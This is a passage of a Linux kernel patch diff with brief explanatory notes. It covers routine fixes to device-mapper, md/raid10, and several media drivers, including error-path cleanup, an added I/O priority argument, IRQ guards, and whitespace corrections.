+ 	}
+ 
+ 	ms->rh = dm_region_hash_create(ms, dispatch_bios, wakeup_mirrord,
+diff --git a/drivers/md/dm-snap-persistent.c b/drivers/md/dm-snap-persistent.c
+index 80b95746a43e0..eee1cd3aa3fcf 100644
+--- a/drivers/md/dm-snap-persistent.c
++++ b/drivers/md/dm-snap-persistent.c
+@@ -220,7 +220,7 @@ static void do_metadata(struct work_struct *work)
+ {
+ 	struct mdata_req *req = container_of(work, struct mdata_req, work);
+ 
+-	req->result = dm_io(req->io_req, 1, req->where, NULL);
++	req->result = dm_io(req->io_req, 1, req->where, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ /*
+@@ -244,7 +244,7 @@ static int chunk_io(struct pstore *ps, void *area, chunk_t chunk, blk_opf_t opf,
+ 	struct mdata_req req;
+ 
+ 	if (!metadata)
+-		return dm_io(&io_req, 1, &where, NULL);
++		return dm_io(&io_req, 1, &where, NULL, IOPRIO_DEFAULT);
+ 
+ 	req.where = &where;
+ 	req.io_req = &io_req;
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index e0367a672eabf..aabb2435070b8 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -72,7 +72,7 @@ static sector_t high(struct dm_table *t, unsigned int l, unsigned int n)
+ 		n = get_child(n, CHILDREN_PER_NODE - 1);
+ 
+ 	if (n >= t->counts[l])
+-		return (sector_t) - 1;
++		return (sector_t) -1;
+ 
+ 	return get_node(t, l, n)[KEYS_PER_NODE - 1];
+ }
+@@ -1533,7 +1533,7 @@ static bool dm_table_any_dev_attr(struct dm_table *t,
+ 		if (ti->type->iterate_devices &&
+ 		    ti->type->iterate_devices(ti, func, data))
+ 			return true;
+-        }
++	}
+ 
+ 	return false;
+ }
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index 601f9e4e6234f..f24d89af7c5f0 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -1179,9 +1179,9 @@ static void process_prepared_discard_passdown_pt1(struct dm_thin_new_mapping *m)
+ 	discard_parent = bio_alloc(NULL, 1, 0, GFP_NOIO);
+ 	discard_parent->bi_end_io = passdown_endio;
+ 	discard_parent->bi_private = m;
+- 	if (m->maybe_shared)
+- 		passdown_double_checking_shared_status(m, discard_parent);
+- 	else {
++	if (m->maybe_shared)
++		passdown_double_checking_shared_status(m, discard_parent);
++	else {
+ 		struct discard_op op;
+ 
+ 		begin_discard(&op, tc, discard_parent);
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index b48e1b59e6da4..6a707b41dc865 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -503,7 +503,7 @@ static noinline int verity_recheck(struct dm_verity *v, struct dm_verity_io *io,
+ 	io_loc.bdev = v->data_dev->bdev;
+ 	io_loc.sector = cur_block << (v->data_dev_block_bits - SECTOR_SHIFT);
+ 	io_loc.count = 1 << (v->data_dev_block_bits - SECTOR_SHIFT);
+-	r = dm_io(&io_req, 1, &io_loc, NULL);
++	r = dm_io(&io_req, 1, &io_loc, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		goto free_ret;
+ 
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 4620a98c99561..db93a91169d5e 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -80,12 +80,12 @@ struct dm_verity_io {
+ 	/* original value of bio->bi_end_io */
+ 	bio_end_io_t *orig_bi_end_io;
+ 
++	struct bvec_iter iter;
++
+ 	sector_t block;
+ 	unsigned int n_blocks;
+ 	bool in_tasklet;
+ 
+-	struct bvec_iter iter;
+-
+ 	struct work_struct work;
+ 
+ 	char *recheck_buffer;
+diff --git a/drivers/md/dm-writecache.c b/drivers/md/dm-writecache.c
+index c6ff43a8f0b25..20fc84b24fc75 100644
+--- a/drivers/md/dm-writecache.c
++++ b/drivers/md/dm-writecache.c
+@@ -531,7 +531,7 @@ static void ssd_commit_flushed(struct dm_writecache *wc, bool wait_for_ios)
+ 		req.notify.context = &endio;
+ 
+ 		/* writing via async dm-io (implied by notify.fn above) won't return an error */
+-	        (void) dm_io(&req, 1, &region, NULL);
++		(void) dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 		i = j;
+ 	}
+ 
+@@ -568,7 +568,7 @@ static void ssd_commit_superblock(struct dm_writecache *wc)
+ 	req.notify.fn = NULL;
+ 	req.notify.context = NULL;
+ 
+-	r = dm_io(&req, 1, &region, NULL);
++	r = dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		writecache_error(wc, r, "error writing superblock");
+ }
+@@ -596,7 +596,7 @@ static void writecache_disk_flush(struct dm_writecache *wc, struct dm_dev *dev)
+ 	req.client = wc->dm_io;
+ 	req.notify.fn = NULL;
+ 
+-	r = dm_io(&req, 1, &region, NULL);
++	r = dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ 	if (unlikely(r))
+ 		writecache_error(wc, r, "error flushing metadata: %d", r);
+ }
+@@ -984,7 +984,7 @@ static int writecache_read_metadata(struct dm_writecache *wc, sector_t n_sectors
+ 	req.client = wc->dm_io;
+ 	req.notify.fn = NULL;
+ 
+-	return dm_io(&req, 1, &region, NULL);
++	return dm_io(&req, 1, &region, NULL, IOPRIO_DEFAULT);
+ }
+ 
+ static void writecache_resume(struct dm_target *ti)
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 0ec85d159bcde..29270f6f272f6 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2897,6 +2897,9 @@ static void __dm_internal_suspend(struct mapped_device *md, unsigned int suspend
+ 
+ static void __dm_internal_resume(struct mapped_device *md)
+ {
++	int r;
++	struct dm_table *map;
++
+ 	BUG_ON(!md->internal_suspend_count);
+ 
+ 	if (--md->internal_suspend_count)
+@@ -2905,12 +2908,23 @@ static void __dm_internal_resume(struct mapped_device *md)
+ 	if (dm_suspended_md(md))
+ 		goto done; /* resume from nested suspend */
+ 
+-	/*
+-	 * NOTE: existing callers don't need to call dm_table_resume_targets
+-	 * (which may fail -- so best to avoid it for now by passing NULL map)
+-	 */
+-	(void) __dm_resume(md, NULL);
+-
++	map = rcu_dereference_protected(md->map, lockdep_is_held(&md->suspend_lock));
++	r = __dm_resume(md, map);
++	if (r) {
++		/*
++		 * If a preresume method of some target failed, we are in a
++		 * tricky situation. We can't return an error to the caller. We
++		 * can't fake success because then the "resume" and
++		 * "postsuspend" methods would not be paired correctly, and it
++		 * would break various targets, for example it would cause list
++		 * corruption in the "origin" target.
++		 *
++		 * So, we fake normal suspend here, to make sure that the
++		 * "resume" and "postsuspend" methods will be paired correctly.
++		 */
++		DMERR("Preresume method failed: %d", r);
++		set_bit(DMF_SUSPENDED, &md->flags);
++	}
+ done:
+ 	clear_bit(DMF_SUSPENDED_INTERNALLY, &md->flags);
+ 	smp_mb__after_atomic();
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 846bdee4daa0e..788acc81e7a84 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -4903,11 +4903,21 @@ action_store(struct mddev *mddev, const char *page, size_t len)
+ 			return -EINVAL;
+ 		err = mddev_lock(mddev);
+ 		if (!err) {
+-			if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery))
++			if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery)) {
+ 				err =  -EBUSY;
+-			else {
++			} else if (mddev->reshape_position == MaxSector ||
++				   mddev->pers->check_reshape == NULL ||
++				   mddev->pers->check_reshape(mddev)) {
+ 				clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+ 				err = mddev->pers->start_reshape(mddev);
++			} else {
++				/*
++				 * If reshape is still in progress, and
++				 * md_check_recovery() can continue to reshape,
++				 * don't restart reshape because data can be
++				 * corrupted for raid456.
++				 */
++				clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+ 			}
+ 			mddev_unlock(mddev);
+ 		}
+@@ -6233,7 +6243,15 @@ static void md_clean(struct mddev *mddev)
+ 	mddev->persistent = 0;
+ 	mddev->level = LEVEL_NONE;
+ 	mddev->clevel[0] = 0;
+-	mddev->flags = 0;
++	/*
++	 * Don't clear MD_CLOSING, or mddev can be opened again.
++	 * 'hold_active != 0' means mddev is still in the creation
++	 * process and will be used later.
++	 */
++	if (mddev->hold_active)
++		mddev->flags = 0;
++	else
++		mddev->flags &= BIT_ULL_MASK(MD_CLOSING);
+ 	mddev->sb_flags = 0;
+ 	mddev->ro = MD_RDWR;
+ 	mddev->metadata_type[0] = 0;
+@@ -7561,7 +7579,6 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 	int err = 0;
+ 	void __user *argp = (void __user *)arg;
+ 	struct mddev *mddev = NULL;
+-	bool did_set_md_closing = false;
+ 
+ 	if (!md_ioctl_valid(cmd))
+ 		return -ENOTTY;
+@@ -7648,7 +7665,6 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 			err = -EBUSY;
+ 			goto out;
+ 		}
+-		did_set_md_closing = true;
+ 		mutex_unlock(&mddev->open_mutex);
+ 		sync_blockdev(bdev);
+ 	}
+@@ -7811,7 +7827,7 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 		mddev->hold_active = 0;
+ 	mddev_unlock(mddev);
+ out:
+-	if(did_set_md_closing)
++	if (cmd == STOP_ARRAY_RO || (err && cmd == STOP_ARRAY))
+ 		clear_bit(MD_CLOSING, &mddev->flags);
+ 	return err;
+ }
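
The md_clean() change above is easy to misread: BIT_ULL_MASK(nr) in the kernel expands to 1ULL << (nr % 64), i.e. a single bit, so "flags &= BIT_ULL_MASK(MD_CLOSING)" clears every flag except MD_CLOSING, matching the new comment. A user-space sketch (the bit position is illustrative, not md.h's real value):

	#include <stdio.h>

	#define BIT_ULL(nr)		(1ULL << (nr))
	#define BIT_ULL_MASK(nr)	(1ULL << ((nr) % 64))	/* as in include/linux/bits.h */

	enum { MD_CLOSING = 1 };	/* illustrative position only */

	int main(void)
	{
		unsigned long long flags = BIT_ULL(MD_CLOSING) | BIT_ULL(3) | BIT_ULL(5);

		flags &= BIT_ULL_MASK(MD_CLOSING);
		printf("%#llx\n", flags);	/* 0x2: only MD_CLOSING survives */
		return 0;
	}
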
+diff --git a/drivers/md/persistent-data/dm-btree.c b/drivers/md/persistent-data/dm-btree.c
+index 1cc783d7030d8..18d949d63543b 100644
+--- a/drivers/md/persistent-data/dm-btree.c
++++ b/drivers/md/persistent-data/dm-btree.c
+@@ -726,7 +726,7 @@ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *
+  * nodes, so saves metadata space.
+  */
+ static int split_two_into_three(struct shadow_spine *s, unsigned int parent_index,
+-                                struct dm_btree_value_type *vt, uint64_t key)
++				struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+ 	unsigned int middle_index;
+@@ -781,7 +781,7 @@ static int split_two_into_three(struct shadow_spine *s, unsigned int parent_inde
+ 		if (shadow_current(s) != right)
+ 			unlock_block(s->info, right);
+ 
+-	        return r;
++		return r;
+ 	}
+ 
+ 
+@@ -1216,7 +1216,7 @@ int btree_get_overwrite_leaf(struct dm_btree_info *info, dm_block_t root,
+ static bool need_insert(struct btree_node *node, uint64_t *keys,
+ 			unsigned int level, unsigned int index)
+ {
+-        return ((index >= le32_to_cpu(node->header.nr_entries)) ||
++	return ((index >= le32_to_cpu(node->header.nr_entries)) ||
+ 		(le64_to_cpu(node->keys[index]) != keys[level]));
+ }
+ 
+diff --git a/drivers/md/persistent-data/dm-space-map-common.c b/drivers/md/persistent-data/dm-space-map-common.c
+index af800efed9f3c..4833a3998c1d9 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.c
++++ b/drivers/md/persistent-data/dm-space-map-common.c
+@@ -390,7 +390,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ }
+ 
+ int sm_ll_find_common_free_block(struct ll_disk *old_ll, struct ll_disk *new_ll,
+-	                         dm_block_t begin, dm_block_t end, dm_block_t *b)
++				 dm_block_t begin, dm_block_t end, dm_block_t *b)
+ {
+ 	int r;
+ 	uint32_t count;
+diff --git a/drivers/md/persistent-data/dm-space-map-common.h b/drivers/md/persistent-data/dm-space-map-common.h
+index 706ceb85d6800..63d9a72e3265c 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.h
++++ b/drivers/md/persistent-data/dm-space-map-common.h
+@@ -120,7 +120,7 @@ int sm_ll_lookup(struct ll_disk *ll, dm_block_t b, uint32_t *result);
+ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 			  dm_block_t end, dm_block_t *result);
+ int sm_ll_find_common_free_block(struct ll_disk *old_ll, struct ll_disk *new_ll,
+-	                         dm_block_t begin, dm_block_t end, dm_block_t *result);
++				 dm_block_t begin, dm_block_t end, dm_block_t *result);
+ 
+ /*
+  * The next three functions return (via nr_allocations) the net number of
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 7b318e7e8d459..009f7ffe4e10c 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -920,6 +920,7 @@ static void flush_pending_writes(struct r10conf *conf)
+ 
+ 			raid1_submit_write(bio);
+ 			bio = next;
++			cond_resched();
+ 		}
+ 		blk_finish_plug(&plug);
+ 	} else
+@@ -1130,6 +1131,7 @@ static void raid10_unplug(struct blk_plug_cb *cb, bool from_schedule)
+ 
+ 		raid1_submit_write(bio);
+ 		bio = next;
++		cond_resched();
+ 	}
+ 	kfree(plug);
+ }
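
The two raid10 hunks add the same one-liner: when flushing a plugged batch of writes in process context, yield between submissions so a very long bio list cannot monopolize the CPU. A condensed sketch of the loop shape, where submit_one() is a hypothetical stand-in for raid1_submit_write():

	while (bio) {
		struct bio *next = bio->bi_next;

		bio->bi_next = NULL;
		submit_one(bio);	/* hypothetical stand-in */
		bio = next;
		cond_resched();		/* yield once per submission */
	}
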
+diff --git a/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c b/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c
+index 303d02b1d71c9..fe30f5b0050dd 100644
+--- a/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c
++++ b/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c
+@@ -113,6 +113,7 @@ int tpg_alloc(struct tpg_data *tpg, unsigned max_w)
+ {
+ 	unsigned pat;
+ 	unsigned plane;
++	int ret = 0;
+ 
+ 	tpg->max_line_width = max_w;
+ 	for (pat = 0; pat < TPG_MAX_PAT_LINES; pat++) {
+@@ -121,14 +122,18 @@ int tpg_alloc(struct tpg_data *tpg, unsigned max_w)
+ 
+ 			tpg->lines[pat][plane] =
+ 				vzalloc(array3_size(max_w, 2, pixelsz));
+-			if (!tpg->lines[pat][plane])
+-				return -ENOMEM;
++			if (!tpg->lines[pat][plane]) {
++				ret = -ENOMEM;
++				goto free_lines;
++			}
+ 			if (plane == 0)
+ 				continue;
+ 			tpg->downsampled_lines[pat][plane] =
+ 				vzalloc(array3_size(max_w, 2, pixelsz));
+-			if (!tpg->downsampled_lines[pat][plane])
+-				return -ENOMEM;
++			if (!tpg->downsampled_lines[pat][plane]) {
++				ret = -ENOMEM;
++				goto free_lines;
++			}
+ 		}
+ 	}
+ 	for (plane = 0; plane < TPG_MAX_PLANES; plane++) {
+@@ -136,18 +141,45 @@ int tpg_alloc(struct tpg_data *tpg, unsigned max_w)
+ 
+ 		tpg->contrast_line[plane] =
+ 			vzalloc(array_size(pixelsz, max_w));
+-		if (!tpg->contrast_line[plane])
+-			return -ENOMEM;
++		if (!tpg->contrast_line[plane]) {
++			ret = -ENOMEM;
++			goto free_contrast_line;
++		}
+ 		tpg->black_line[plane] =
+ 			vzalloc(array_size(pixelsz, max_w));
+-		if (!tpg->black_line[plane])
+-			return -ENOMEM;
++		if (!tpg->black_line[plane]) {
++			ret = -ENOMEM;
++			goto free_contrast_line;
++		}
+ 		tpg->random_line[plane] =
+ 			vzalloc(array3_size(max_w, 2, pixelsz));
+-		if (!tpg->random_line[plane])
+-			return -ENOMEM;
++		if (!tpg->random_line[plane]) {
++			ret = -ENOMEM;
++			goto free_contrast_line;
++		}
+ 	}
+ 	return 0;
++
++free_contrast_line:
++	for (plane = 0; plane < TPG_MAX_PLANES; plane++) {
++		vfree(tpg->contrast_line[plane]);
++		vfree(tpg->black_line[plane]);
++		vfree(tpg->random_line[plane]);
++		tpg->contrast_line[plane] = NULL;
++		tpg->black_line[plane] = NULL;
++		tpg->random_line[plane] = NULL;
++	}
++free_lines:
++	for (pat = 0; pat < TPG_MAX_PAT_LINES; pat++)
++		for (plane = 0; plane < TPG_MAX_PLANES; plane++) {
++			vfree(tpg->lines[pat][plane]);
++			tpg->lines[pat][plane] = NULL;
++			if (plane == 0)
++				continue;
++			vfree(tpg->downsampled_lines[pat][plane]);
++			tpg->downsampled_lines[pat][plane] = NULL;
++		}
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(tpg_alloc);
+ 
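
tpg_alloc() previously returned -ENOMEM mid-loop and leaked everything allocated so far. The fix above applies the usual kernel unwind pattern: one label per allocation stage, each freeing what earlier stages produced and NULLing the pointers so a later tpg_free() stays safe. A minimal sketch of the pattern, with hypothetical names:

	static int alloc_stages(struct ctx *c)
	{
		c->a = vzalloc(A_SIZE);
		if (!c->a)
			return -ENOMEM;		/* nothing to undo yet */

		c->b = vzalloc(B_SIZE);
		if (!c->b)
			goto free_a;

		return 0;

	free_a:
		vfree(c->a);
		c->a = NULL;			/* keep a later free path safe */
		return -ENOMEM;
	}
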
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index d352e028491aa..aefee2277254d 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -494,6 +494,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		dvbdevfops = kmemdup(template->fops, sizeof(*dvbdevfops), GFP_KERNEL);
+ 		if (!dvbdevfops) {
+ 			kfree(dvbdev);
++			*pdvbdev = NULL;
+ 			mutex_unlock(&dvbdev_register_lock);
+ 			return -ENOMEM;
+ 		}
+@@ -502,6 +503,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		if (!new_node) {
+ 			kfree(dvbdevfops);
+ 			kfree(dvbdev);
++			*pdvbdev = NULL;
+ 			mutex_unlock(&dvbdev_register_lock);
+ 			return -ENOMEM;
+ 		}
+@@ -535,6 +537,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		}
+ 		list_del (&dvbdev->list_head);
+ 		kfree(dvbdev);
++		*pdvbdev = NULL;
+ 		up_write(&minor_rwsem);
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return -EINVAL;
+@@ -557,6 +560,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+ 		kfree(dvbdev);
++		*pdvbdev = NULL;
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return ret;
+ 	}
+@@ -575,6 +579,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+ 		kfree(dvbdev);
++		*pdvbdev = NULL;
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return PTR_ERR(clsdev);
+ 	}
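
dvb_register_device() stores the new device through *pdvbdev before the failure paths above run, so every error exit must also reset the out parameter; otherwise the caller is left holding a pointer to freed memory. The contract, sketched with hypothetical names:

	static int create_object(struct obj **out)
	{
		struct obj *o = kzalloc(sizeof(*o), GFP_KERNEL);

		if (!o)
			return -ENOMEM;

		*out = o;			/* published early, like *pdvbdev */

		if (setup(o)) {
			kfree(o);
			*out = NULL;		/* never leave *out dangling */
			return -EINVAL;
		}

		return 0;
	}
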
+diff --git a/drivers/media/dvb-frontends/stv0367.c b/drivers/media/dvb-frontends/stv0367.c
+index 04556b77c16c9..0977564a4a1a4 100644
+--- a/drivers/media/dvb-frontends/stv0367.c
++++ b/drivers/media/dvb-frontends/stv0367.c
+@@ -118,50 +118,32 @@ static const s32 stv0367cab_RF_LookUp2[RF_LOOKUP_TABLE2_SIZE][RF_LOOKUP_TABLE2_S
+ 	}
+ };
+ 
+-static
+-int stv0367_writeregs(struct stv0367_state *state, u16 reg, u8 *data, int len)
++static noinline_for_stack
++int stv0367_writereg(struct stv0367_state *state, u16 reg, u8 data)
+ {
+-	u8 buf[MAX_XFER_SIZE];
++	u8 buf[3] = { MSB(reg), LSB(reg), data };
+ 	struct i2c_msg msg = {
+ 		.addr = state->config->demod_address,
+ 		.flags = 0,
+ 		.buf = buf,
+-		.len = len + 2
++		.len = 3,
+ 	};
+ 	int ret;
+ 
+-	if (2 + len > sizeof(buf)) {
+-		printk(KERN_WARNING
+-		       "%s: i2c wr reg=%04x: len=%d is too big!\n",
+-		       KBUILD_MODNAME, reg, len);
+-		return -EINVAL;
+-	}
+-
+-
+-	buf[0] = MSB(reg);
+-	buf[1] = LSB(reg);
+-	memcpy(buf + 2, data, len);
+-
+ 	if (i2cdebug)
+ 		printk(KERN_DEBUG "%s: [%02x] %02x: %02x\n", __func__,
+-			state->config->demod_address, reg, buf[2]);
++			state->config->demod_address, reg, data);
+ 
+ 	ret = i2c_transfer(state->i2c, &msg, 1);
+ 	if (ret != 1)
+ 		printk(KERN_ERR "%s: i2c write error! ([%02x] %02x: %02x)\n",
+-			__func__, state->config->demod_address, reg, buf[2]);
++			__func__, state->config->demod_address, reg, data);
+ 
+ 	return (ret != 1) ? -EREMOTEIO : 0;
+ }
+ 
+-static int stv0367_writereg(struct stv0367_state *state, u16 reg, u8 data)
+-{
+-	u8 tmp = data; /* see gcc.gnu.org/bugzilla/show_bug.cgi?id=81715 */
+-
+-	return stv0367_writeregs(state, reg, &tmp, 1);
+-}
+-
+-static u8 stv0367_readreg(struct stv0367_state *state, u16 reg)
++static noinline_for_stack
++u8 stv0367_readreg(struct stv0367_state *state, u16 reg)
+ {
+ 	u8 b0[] = { 0, 0 };
+ 	u8 b1[] = { 0 };
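
The stv0367 rework replaces the variable-length stv0367_writeregs() with a fixed three-byte write and marks both register accessors noinline_for_stack. The annotation matters because each helper keeps an i2c buffer in its own frame; if the compiler inlined many accessor calls into one large function, those buffers would accumulate in a single stack frame. Shape of the resulting helper, with a hypothetical transport call:

	static noinline_for_stack int write_reg(struct chip *c, u16 reg, u8 val)
	{
		u8 buf[3] = { reg >> 8, reg & 0xff, val };	/* MSB, LSB, data */

		return i2c_send(c, buf, sizeof(buf));	/* hypothetical transport */
	}
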
+diff --git a/drivers/media/i2c/tc358743.c b/drivers/media/i2c/tc358743.c
+index 200841c1f5cf0..68628ccecd161 100644
+--- a/drivers/media/i2c/tc358743.c
++++ b/drivers/media/i2c/tc358743.c
+@@ -2094,9 +2094,6 @@ static int tc358743_probe(struct i2c_client *client)
+ 	state->mbus_fmt_code = MEDIA_BUS_FMT_RGB888_1X24;
+ 
+ 	sd->dev = &client->dev;
+-	err = v4l2_async_register_subdev(sd);
+-	if (err < 0)
+-		goto err_hdl;
+ 
+ 	mutex_init(&state->confctl_mutex);
+ 
+@@ -2154,6 +2151,10 @@ static int tc358743_probe(struct i2c_client *client)
+ 	if (err)
+ 		goto err_work_queues;
+ 
++	err = v4l2_async_register_subdev(sd);
++	if (err < 0)
++		goto err_work_queues;
++
+ 	v4l2_info(sd, "%s found @ 0x%x (%s)\n", client->name,
+ 		  client->addr << 1, client->adapter->name);
+ 
+diff --git a/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c b/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c
+index b065ccd069140..378a1cba0144f 100644
+--- a/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c
++++ b/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c
+@@ -26,7 +26,7 @@ static void mtk_mdp_vpu_handle_init_ack(const struct mdp_ipi_comm_ack *msg)
+ 	vpu->inst_addr = msg->vpu_inst_addr;
+ }
+ 
+-static void mtk_mdp_vpu_ipi_handler(const void *data, unsigned int len,
++static void mtk_mdp_vpu_ipi_handler(void *data, unsigned int len,
+ 				    void *priv)
+ {
+ 	const struct mdp_ipi_comm_ack *msg = data;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c
+index cfc7ebed8fb7a..1ec29f1b163a1 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c
+@@ -29,15 +29,7 @@ static int mtk_vcodec_vpu_set_ipi_register(struct mtk_vcodec_fw *fw, int id,
+ 					   mtk_vcodec_ipi_handler handler,
+ 					   const char *name, void *priv)
+ {
+-	/*
+-	 * The handler we receive takes a void * as its first argument. We
+-	 * cannot change this because it needs to be passed down to the rproc
+-	 * subsystem when SCP is used. VPU takes a const argument, which is
+-	 * more constrained, so the conversion below is safe.
+-	 */
+-	ipi_handler_t handler_const = (ipi_handler_t)handler;
+-
+-	return vpu_ipi_register(fw->pdev, id, handler_const, name, priv);
++	return vpu_ipi_register(fw->pdev, id, handler, name, priv);
+ }
+ 
+ static int mtk_vcodec_vpu_ipi_send(struct mtk_vcodec_fw *fw, int id, void *buf,
+diff --git a/drivers/media/platform/mediatek/vpu/mtk_vpu.c b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+index 6beab9e86a22a..44adf5cfc9bb2 100644
+--- a/drivers/media/platform/mediatek/vpu/mtk_vpu.c
++++ b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+@@ -635,7 +635,7 @@ int vpu_load_firmware(struct platform_device *pdev)
+ }
+ EXPORT_SYMBOL_GPL(vpu_load_firmware);
+ 
+-static void vpu_init_ipi_handler(const void *data, unsigned int len, void *priv)
++static void vpu_init_ipi_handler(void *data, unsigned int len, void *priv)
+ {
+ 	struct mtk_vpu *vpu = priv;
+ 	const struct vpu_run *run = data;
+diff --git a/drivers/media/platform/mediatek/vpu/mtk_vpu.h b/drivers/media/platform/mediatek/vpu/mtk_vpu.h
+index a56053ff135af..da05f3e740810 100644
+--- a/drivers/media/platform/mediatek/vpu/mtk_vpu.h
++++ b/drivers/media/platform/mediatek/vpu/mtk_vpu.h
+@@ -17,7 +17,7 @@
+  * VPU interfaces with other blocks by share memory and interrupt.
+  */
+ 
+-typedef void (*ipi_handler_t) (const void *data,
++typedef void (*ipi_handler_t) (void *data,
+ 			       unsigned int len,
+ 			       void *priv);
+ 
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c
+index d4540684ea9af..0bcb9db5ad190 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c
+@@ -701,6 +701,9 @@ irqreturn_t rkisp1_capture_isr(int irq, void *ctx)
+ 	unsigned int i;
+ 	u32 status;
+ 
++	if (!rkisp1->irqs_enabled)
++		return IRQ_NONE;
++
+ 	status = rkisp1_read(rkisp1, RKISP1_CIF_MI_MIS);
+ 	if (!status)
+ 		return IRQ_NONE;
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+index f9ec1c6138947..5776292f914a4 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+@@ -467,6 +467,7 @@ struct rkisp1_debug {
+  * @debug:	   debug params to be exposed on debugfs
+  * @info:	   version-specific ISP information
+  * @irqs:          IRQ line numbers
++ * @irqs_enabled:  the hardware is enabled and can cause interrupts
+  */
+ struct rkisp1_device {
+ 	void __iomem *base_addr;
+@@ -488,6 +489,7 @@ struct rkisp1_device {
+ 	struct rkisp1_debug debug;
+ 	const struct rkisp1_info *info;
+ 	int irqs[RKISP1_NUM_IRQS];
++	bool irqs_enabled;
+ };
+ 
+ /*
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+index e862f515cc6d3..95b6e41c48ec2 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+@@ -211,6 +211,9 @@ irqreturn_t rkisp1_csi_isr(int irq, void *ctx)
+ 	struct rkisp1_device *rkisp1 = dev_get_drvdata(dev);
+ 	u32 val, status;
+ 
++	if (!rkisp1->irqs_enabled)
++		return IRQ_NONE;
++
+ 	status = rkisp1_read(rkisp1, RKISP1_CIF_MIPI_MIS);
+ 	if (!status)
+ 		return IRQ_NONE;
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index 41abb18b00acb..7a3b69ba51b97 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -305,6 +305,24 @@ static int __maybe_unused rkisp1_runtime_suspend(struct device *dev)
+ {
+ 	struct rkisp1_device *rkisp1 = dev_get_drvdata(dev);
+ 
++	rkisp1->irqs_enabled = false;
++	/* Make sure the IRQ handler will see the above */
